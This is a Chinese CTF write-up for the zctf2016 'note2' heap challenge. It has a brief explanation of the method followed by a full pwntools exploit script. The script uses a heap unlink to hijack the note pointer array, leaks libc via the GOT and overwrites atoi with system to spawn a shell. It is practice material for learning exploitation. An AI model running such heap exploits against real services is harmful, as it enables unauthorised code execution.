zctf2016_note2

思路

利用unlink分配到存储chunk的ptr数组处，改chunk的地址为got表地址即可泄露libc，然后通过edit函数将atoi_got改为system函数的地址，让程序再次执行atoi，并输入参数"/bin/shx00"，即执行system("/bin/sh")拿shell。

exp

from pwn import *

#context.log_level = 'debug'

#io = process('./note2')
io = remote('node3.buuoj.cn',28019)
elf = ELF('./note2')
libc = ELF('./libc/libc-2.23.so')
atoi_got = elf.got['atoi']

def new(size,content):
	io.recvuntil('option--->>')
	io.sendline('1')
	io.recvuntil('Input the length of the note content:(less than 128)')
	io.sendline(str(size))
	io.recvuntil('Input the note content:')
	io.sendline(content)

def show(num):
	io.recvuntil('option--->>')
	io.sendline('2')
	io.recvuntil('Input the id of the note:')
	io.sendline(str(num))
	io.recvuntil('Content is ')
	content = io.recv()
	return content

def edit(num,content,num1):
	io.recvuntil('option--->>')
	io.sendline('3')
	io.recvuntil('Input the id of the note:')
	io.sendline(str(num))
	io.recvuntil('do you want to overwrite or append?[1.overwrite/2.append]'
)
	io.sendline(str(num1))
	io.recvuntil('TheNewContents:')
	io.sendline(content)

def delete(num):
        io.recvuntil('option--->>')
        io.sendline('4')
	io.recvuntil('Input the id of the note:')
	io.sendline(str(num))


heap_ptr_1=0x602120
fake_chunk = p64(0)+p64(0x81+0x20)
fake_chunk += p64(heap_ptr_1 - 0x18) + p64(heap_ptr_1 - 0x10)
fake_chunk += 'a'*0x10

io.recvuntil('Input your name:')
io.sendline('aaaa')
io.recvuntil('Input your address:')
io.sendline('1111')

new(0x80,fake_chunk)
new(0,'')
new(0x80,'b'*0x20)
new(0x10,'c'*0x8)

payload = 'd'*0x10 + 'd'*0x8 + p8(0x90)
edit(1,payload,1)

for i in range(7,-1,-1):
	payload = 'd'*0x10 + 'd'*i
	edit(1,payload,1)

payload = 'd'*0x10 + p64(0x20+0x80)
edit(1,payload,1)

delete(2)

edit(0,'a'*0x18 + p64(atoi_got),1)

atoi_addr = u64(show(0)[0:6].ljust(8,'x00'))
print 'atoi_addr:'+ hex(atoi_addr)
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
print 'system:'+hex(system_addr)

io.sendline('3')
io.sendlineafter('Input the id of the note:','0')
io.sendlineafter('do you want to overwrite or append?[1.overwrite/2.append]','1')
io.sendlineafter('TheNewContents:',p64(system_addr))

io.sendlineafter('option--->>','/bin/shx00')

io.interactive()

参考

zctf2016_note2